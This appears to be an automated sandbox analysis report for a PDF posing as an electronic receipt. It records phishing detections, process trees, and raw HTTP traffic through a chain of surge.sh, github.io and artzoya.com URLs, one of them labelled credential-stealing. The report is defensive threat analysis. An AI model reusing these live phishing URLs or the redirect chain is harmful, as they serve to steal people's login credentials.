Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Electronic Receipt for Carolann Campbell.pdf

Overview

General Information

Sample name:Electronic Receipt for Carolann Campbell.pdf
Analysis ID:1520602
MD5:677f99c2bfd3de62e11ac90c44254fc8
SHA1:0544869264904f703f52dc79b507a8594cfe4c44
SHA256:f728d07cf9ee8f30fadd0c9e389cb1a4c1d94c03ec68fd976e917146aea33873
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish44
Yara detected obfuscated html page
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7352 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Electronic Receipt for Carolann Campbell.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7568 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7764 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1704,i,521793384372817421,16056266662366640805,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 1252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://equable-toothpaste.surge.sh/3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2368,i,14601715867905608088,3878911157350375743,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_1080JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    dropped/chromecache_1080JoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
      dropped/chromecache_778JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
        dropped/chromecache_778JoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
          dropped/chromecache_879JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://sharedfiles2.github.io/feel1/SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

            Phishing

            barindex
            Source: Yara matchFile source: dropped/chromecache_1080, type: DROPPED
            Source: Yara matchFile source: dropped/chromecache_778, type: DROPPED
            Source: Yara matchFile source: dropped/chromecache_879, type: DROPPED
            Source: Yara matchFile source: dropped/chromecache_1080, type: DROPPED
            Source: Yara matchFile source: dropped/chromecache_778, type: DROPPED
            Source: Yara matchFile source: dropped/chromecache_879, type: DROPPED
            Source: https://www.google.com/intl/en-US/gmail/about/HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="24px" height="24px" viewBox="0 0 24 24" fill="#545454"><path d="M7 10l5 5 5-5z"></path></svg>
            Source: https://sharedfiles2.github.io/feel1/HTTP Parser: No favicon
            Source: https://sharedfiles2.github.io/feel1/HTTP Parser: No favicon
            Source: https://google.com/404/HTTP Parser: No favicon
            Source: https://www.google.com/HTTP Parser: No favicon
            Source: https://www.google.com/HTTP Parser: No favicon
            Source: https://www.google.com/HTTP Parser: No favicon
            Source: https://www.google.com/HTTP Parser: No favicon
            Source: https://www.google.com/HTTP Parser: No favicon
            Source: https://www.google.com/imghp?hl=en&ogblHTTP Parser: No favicon
            Source: https://www.google.com/imghp?hl=en&ogblHTTP Parser: No favicon
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:49761 version: TLS 1.2
            Source: Binary string: h);if(b)return U.yield(_.Yt(a.getRoot().el(),{Ve:l,KK:!0,eA:new _.Nt("homeport_promo_banner",{priority:"x"})}),5);if(e===String(Number(2))&&f){if(g!==Number(0)){U.Fb(5);break}m=a.getRoot().el();q=_.pDb((p=m.id)!=null?p:"");A=(z=(u=q)==null?void 0:u.ck)!=null?z:"middleslothpp";return U.yield(_.Yt(a.getRoot().el(),{Ve:l,KK:!0,eA:new _.Nt(A,{priority:"x"})}),5)}return U.yield(_.Yt(a.getRoot().el(),{Ve:l,KK:!0}),5);case 5:_.bR(a.oa,"hpbarr");a.Va("Nll0ne").isEmpty()||_.jf(a.w2a.document,_.WRD);_.vg(U, source: chromecache_1068.12.dr
            Source: Binary string: _.nDb=_.J("VOy8xe");_.oDb=_.J("s2IYHc");_.pDb=_.J("ucVTnf");_.qDb=_.J("pU3PWb"); source: chromecache_947.12.dr
            Source: Binary string: _.KDb=function(){var a=_.Jv;if(a.ka!==null)return a.ka;if(document.body){var b=_.Ql.N7(document.body).top;return a.ka=b}return 0};_.Jv=new _.Iv;_.Kv=function(a){_.Jv.WZa(a)};_.LDb=function(){return _.Jv.getScrollTop()};_.Lv=function(a,b){_.Jv.fixedUiScrollTo(a,b)};NDb=navigator.userAgent.match(/ GSA\/([.\d]+)/);MDb=NDb?NDb[1]:"";_.ODb=_.Vb&&_.pa(MDb,"4")>=0;_.PDb=_.Vb&&_.pa(MDb,"5.2")>=0;_.QDb=_.Vb&&_.pa(MDb,"4.3")>=0&&!(_.pa(MDb,"4.5")>=0); source: chromecache_947.12.dr
            Source: Binary string: _.pDb=function(a){var b;return(b=mDb)==null?void 0:b[a]};sDb=function(){qDb(rDb)};tDb=function(a){a.md!=null&&VCb(a.md,a.astyp);if(a.cb!=null){var b=!1,c=function(){b||(b=!0,a.cb())};(0,_.Bn)(c,400);(0,_.Bn)(function(){google.caft(c)},50)}};uDb=function(a){if(a.md)VCb(a.md,a.astyp);else if(a.dr){var b=!1,c=function(){b||(b=!0,a.dr())};(0,_.Bn)(c,400);(0,_.Bn)(function(){google.caft(c)},50)}};vDb=function(a){_.CUa?(0,google.jd.ms)():a.counter++}; source: chromecache_1068.12.dr
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: artzoya.com to https://google.com/404/
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com to https://recovertogether.withgoogle.com/?utm_source=hpp&utm_medium=referral&utm_campaign=recovertogether
            Source: Joe Sandbox ViewIP Address: 188.166.132.94 188.166.132.94
            Source: Joe Sandbox ViewIP Address: 185.199.110.153 185.199.110.153
            Source: Joe Sandbox ViewIP Address: 185.199.110.153 185.199.110.153
            Source: Joe Sandbox ViewIP Address: 104.78.188.188 104.78.188.188
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: unknownTCP traffic detected without corresponding DNS query: 18.207.85.246
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: c583ad55-e27a-405e-ae1a-c48b4361aa9dx-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
            Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=d9DofA5AZfZodrn&MD=5fM4XGeV HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss HTTP/1.1Host: equable-toothpaste.surge.shConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss/ HTTP/1.1Host: equable-toothpaste.surge.shConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /feel1 HTTP/1.1Host: sharedfiles2.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://equable-toothpaste.surge.sh/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /feel1/ HTTP/1.1Host: sharedfiles2.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://equable-toothpaste.surge.sh/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /media/GGrR89_WgAAgrOI?format=jpg&name=large HTTP/1.1Host: pbs.twimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sharedfiles2.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sharedfiles2.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sharedfiles2.github.io/feel1/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /media/GGrR89_WgAAgrOI?format=jpg&name=large HTTP/1.1Host: pbs.twimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tasty-library.surge.shConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sharedfiles2.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5VaHBaRWc9JnVpZD1VU0VSMTcwOTIwMjRVMDQwOTE3NTA=N0123N HTTP/1.1Host: artzoya.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://tasty-library.surge.sh/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /404/ HTTP/1.1Host: google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://tasty-library.surge.sh/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/errors/robot.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/errors/robot.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
